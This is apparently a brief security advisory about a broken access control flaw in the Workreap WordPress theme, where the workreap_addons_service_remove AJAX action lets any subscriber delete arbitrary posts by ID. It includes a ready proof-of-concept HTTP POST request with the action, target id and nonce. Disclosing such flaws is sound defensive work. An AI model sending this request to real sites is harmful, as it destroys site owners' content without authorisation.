The theme does not verify that an addon service belongs to the user issuing the request, or indeed that it is an addon service, when processing the workreap_addons_service_remove action, allowing any user to delete any post by knowing or guessing the id.
POST /testt/wp-admin/admin-ajax.php HTTP/2 Host: host Cookie: [Subscriber+] Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 65 action=workreap_addons_service_remove&id;=6191&security;=295c6a26b2